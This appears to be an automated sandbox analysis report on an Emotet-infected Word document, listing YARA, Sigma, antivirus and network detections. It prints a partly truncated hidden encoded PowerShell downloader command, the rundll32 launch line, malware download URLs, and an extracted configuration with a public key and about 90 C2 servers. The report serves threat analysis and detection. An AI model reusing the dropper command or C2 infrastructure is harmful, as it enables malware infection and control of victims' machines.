0000000A.00000002.2218317405.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2237360892.0000000000270000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.2170071042.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2180978806.0000000000390000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2227064696.0000000000210000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2270553779.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2248449232.00000000004C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2280539965.00000000002C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2346045466.0000000000220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2216606355.0000000000200000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2193729394.0000000000290000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2281126017.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2206333470.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2216643199.0000000000240000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2258739528.0000000000240000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2180920287.0000000000370000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2348582119.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2346073042.00000000002D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2258693813.0000000000110000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2248357262.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2190752783.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2239757544.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2269461275.0000000000270000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.2169962101.0000000000130000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2228163956.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author
13.2.rundll32.exe.4c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.10000000.12.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.290000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.370000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.12.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2d0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.370000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.240000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.10000000.12.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.10000000.11.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.210000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.10000000.11.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.290000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.270000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.390000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2d0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.270000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.130000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.12.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.10000000.12.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.170000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.170000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.270000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.110000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.110000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3b0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.250000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.10000000.12.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.10000000.12.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.2c0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.250000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
14.2.rundll32.exe.240000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.240000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.10000000.12.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.150000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.220000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
15.2.rundll32.exe.10000000.12.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.270000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
17.2.rundll32.exe.220000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.390000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.150000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.200000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.3b0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.200000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
16.2.rundll32.exe.2c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.4c0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.240000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.3b0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.10000000.12.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3b0000.1.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.10000000.8.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
6.2.rundll32.exe.130000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.10000000.8.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 67 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2724, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, ProcessId: 1980

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

Author: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAK

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://www.teelekded.com/cgi-bin/LPo/	Avira URL Cloud: Label: malware
Source: http://calledtochange.org/CalledtoChange/8huSOd/	Avira URL Cloud: Label: malware
Source: https://ummahstars.com/app_old_may_2018/assets/wDL8x/	Avira URL Cloud: Label: malware
Source: https://hbprivileged.com/cgi-bin/Qg/	Avira URL Cloud: Label: malware
Source: https://www.teelekded.com/cgi-bin/LPo/P	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 13.2.rundll32.exe.4c0000.1.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB", "C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "51.15.7.145:80", "177.85.167.10:80", "186.177.174.163:80", "190.114.254.163:8080", "185.183.16.47:80", "149.202.72.142:7080", "181.30.61.163:443", "31.27.59.105:80", "50.28.51.143:8080", "68.183.190.199:8080", "85.214.26.7:8080", "137.74.106.111:7080", "200.75.39.254:80", "85.105.239.184:443", "190.45.24.210:80", "170.81.48.2:80", "109.101.137.162:8080", "110.39.160.38:443", "110.39.162.2:443", "91.233.197.70:80", "51.255.165.160:8080", "213.52.74.198:80", "12.162.84.2:8080", "82.208.146.142:7080", "60.93.23.51:80", "172.245.248.239:8080", "104.131.41.185:8080", "93.149.120.214:80", "81.214.253.80:443", "190.247.139.101:80", "46.105.114.137:8080", "70.32.115.157:8080", "202.134.4.210:7080", "212.71.237.140:8080", "177.23.7.151:80", "111.67.12.221:8080", "197.232.36.108:80", "190.162.232.138:80", "80.15.100.37:80", "95.76.153.115:80", "154.127.113.242:80", "188.225.32.231:7080", "5.196.35.138:7080", "211.215.18.93:8080", "46.101.58.37:8080", "82.48.39.246:80", "181.10.46.92:80", "190.251.216.100:80", "187.162.248.237:80", "191.223.36.170:80", "138.197.99.250:8080", "201.48.121.65:443", "78.206.229.130:80", "190.210.246.253:80", "68.183.170.114:8080", "87.106.46.107:8080", "122.201.23.45:443", "70.32.84.74:8080", "143.0.85.206:7080", "190.64.88.186:443", "217.13.106.14:8080", "93.146.143.191:80", "188.135.15.49:80", "178.211.45.66:8080", "138.97.60.141:7080", "81.17.93.134:80", "83.169.21.32:7080", "152.231.89.226:80", "80.249.176.206:80", "178.250.54.208:8080", "206.189.232.2:8080", "46.43.2.95:8080", "190.24.243.186:80", "105.209.235.113:8080", "62.84.75.50:80", "152.170.79.100:80", "209.236.123.42:8080", "185.94.252.27:443", "12.163.208.58:80", "152.169.22.67:80", "1.226.84.243:8080", "191.241.233.198:80", "94.176.234.118:443", "209.33.120.130:80", "45.16.226.117:443", "81.215.230.173:443", "172.104.169.32:8080", "201.185.69.28:443", "167.71.148.58:443", "192.175.111.212:7080"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll	Metadefender: Detection: 75%			Perma Link
Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll	ReversingLabs: Detection: 93%

Multi AV Scanner detection for submitted file

Show sources

Source: Io8ic2291n.doc	Metadefender: Detection: 54%			Perma Link
Source: Io8ic2291n.doc	ReversingLabs: Detection: 89%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll

Joe Sandbox ML: detected

Compliance:

Uses insecure TLS / SSL version for HTTPS connection

Show sources

Source: unknown	HTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb` source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdblog source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2163174329.0000000002DB7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2161182141.00000000028A0000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: riandutra.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 177.12.170.95:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 191.6.196.95:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.2.22:49175 -> 84.232.229.24:80
Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.22:49176 -> 51.255.203.164:8080

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 84.232.229.24:80
Source: Malware configuration extractor	IPs: 51.255.203.164:8080
Source: Malware configuration extractor	IPs: 217.160.169.110:8080
Source: Malware configuration extractor	IPs: 51.15.7.145:80
Source: Malware configuration extractor	IPs: 177.85.167.10:80
Source: Malware configuration extractor	IPs: 186.177.174.163:80
Source: Malware configuration extractor	IPs: 190.114.254.163:8080
Source: Malware configuration extractor	IPs: 185.183.16.47:80
Source: Malware configuration extractor	IPs: 149.202.72.142:7080
Source: Malware configuration extractor	IPs: 181.30.61.163:443
Source: Malware configuration extractor	IPs: 31.27.59.105:80
Source: Malware configuration extractor	IPs: 50.28.51.143:8080
Source: Malware configuration extractor	IPs: 68.183.190.199:8080
Source: Malware configuration extractor	IPs: 85.214.26.7:8080
Source: Malware configuration extractor	IPs: 137.74.106.111:7080
Source: Malware configuration extractor	IPs: 200.75.39.254:80
Source: Malware configuration extractor	IPs: 85.105.239.184:443
Source: Malware configuration extractor	IPs: 190.45.24.210:80
Source: Malware configuration extractor	IPs: 170.81.48.2:80
Source: Malware configuration extractor	IPs: 109.101.137.162:8080
Source: Malware configuration extractor	IPs: 110.39.160.38:443
Source: Malware configuration extractor	IPs: 110.39.162.2:443
Source: Malware configuration extractor	IPs: 91.233.197.70:80
Source: Malware configuration extractor	IPs: 51.255.165.160:8080
Source: Malware configuration extractor	IPs: 213.52.74.198:80
Source: Malware configuration extractor	IPs: 12.162.84.2:8080
Source: Malware configuration extractor	IPs: 82.208.146.142:7080
Source: Malware configuration extractor	IPs: 60.93.23.51:80
Source: Malware configuration extractor	IPs: 172.245.248.239:8080
Source: Malware configuration extractor	IPs: 104.131.41.185:8080
Source: Malware configuration extractor	IPs: 93.149.120.214:80
Source: Malware configuration extractor	IPs: 81.214.253.80:443
Source: Malware configuration extractor	IPs: 190.247.139.101:80
Source: Malware configuration extractor	IPs: 46.105.114.137:8080
Source: Malware configuration extractor	IPs: 70.32.115.157:8080
Source: Malware configuration extractor	IPs: 202.134.4.210:7080
Source: Malware configuration extractor	IPs: 212.71.237.140:8080
Source: Malware configuration extractor	IPs: 177.23.7.151:80
Source: Malware configuration extractor	IPs: 111.67.12.221:8080
Source: Malware configuration extractor	IPs: 197.232.36.108:80
Source: Malware configuration extractor	IPs: 190.162.232.138:80
Source: Malware configuration extractor	IPs: 80.15.100.37:80
Source: Malware configuration extractor	IPs: 95.76.153.115:80
Source: Malware configuration extractor	IPs: 154.127.113.242:80
Source: Malware configuration extractor	IPs: 188.225.32.231:7080
Source: Malware configuration extractor	IPs: 5.196.35.138:7080
Source: Malware configuration extractor	IPs: 211.215.18.93:8080
Source: Malware configuration extractor	IPs: 46.101.58.37:8080
Source: Malware configuration extractor	IPs: 82.48.39.246:80
Source: Malware configuration extractor	IPs: 181.10.46.92:80
Source: Malware configuration extractor	IPs: 190.251.216.100:80
Source: Malware configuration extractor	IPs: 187.162.248.237:80
Source: Malware configuration extractor	IPs: 191.223.36.170:80
Source: Malware configuration extractor	IPs: 138.197.99.250:8080
Source: Malware configuration extractor	IPs: 201.48.121.65:443
Source: Malware configuration extractor	IPs: 78.206.229.130:80
Source: Malware configuration extractor	IPs: 190.210.246.253:80
Source: Malware configuration extractor	IPs: 68.183.170.114:8080
Source: Malware configuration extractor	IPs: 87.106.46.107:8080
Source: Malware configuration extractor	IPs: 122.201.23.45:443
Source: Malware configuration extractor	IPs: 70.32.84.74:8080
Source: Malware configuration extractor	IPs: 143.0.85.206:7080
Source: Malware configuration extractor	IPs: 190.64.88.186:443
Source: Malware configuration extractor	IPs: 217.13.106.14:8080
Source: Malware configuration extractor	IPs: 93.146.143.191:80
Source: Malware configuration extractor	IPs: 188.135.15.49:80
Source: Malware configuration extractor	IPs: 178.211.45.66:8080
Source: Malware configuration extractor	IPs: 138.97.60.141:7080
Source: Malware configuration extractor	IPs: 81.17.93.134:80
Source: Malware configuration extractor	IPs: 83.169.21.32:7080
Source: Malware configuration extractor	IPs: 152.231.89.226:80
Source: Malware configuration extractor	IPs: 80.249.176.206:80
Source: Malware configuration extractor	IPs: 178.250.54.208:8080
Source: Malware configuration extractor	IPs: 206.189.232.2:8080
Source: Malware configuration extractor	IPs: 46.43.2.95:8080
Source: Malware configuration extractor	IPs: 190.24.243.186:80
Source: Malware configuration extractor	IPs: 105.209.235.113:8080
Source: Malware configuration extractor	IPs: 62.84.75.50:80
Source: Malware configuration extractor	IPs: 152.170.79.100:80
Source: Malware configuration extractor	IPs: 209.236.123.42:8080
Source: Malware configuration extractor	IPs: 185.94.252.27:443
Source: Malware configuration extractor	IPs: 12.163.208.58:80
Source: Malware configuration extractor	IPs: 152.169.22.67:80
Source: Malware configuration extractor	IPs: 1.226.84.243:8080
Source: Malware configuration extractor	IPs: 191.241.233.198:80
Source: Malware configuration extractor	IPs: 94.176.234.118:443
Source: Malware configuration extractor	IPs: 209.33.120.130:80
Source: Malware configuration extractor	IPs: 45.16.226.117:443
Source: Malware configuration extractor	IPs: 81.215.230.173:443
Source: Malware configuration extractor	IPs: 172.104.169.32:8080
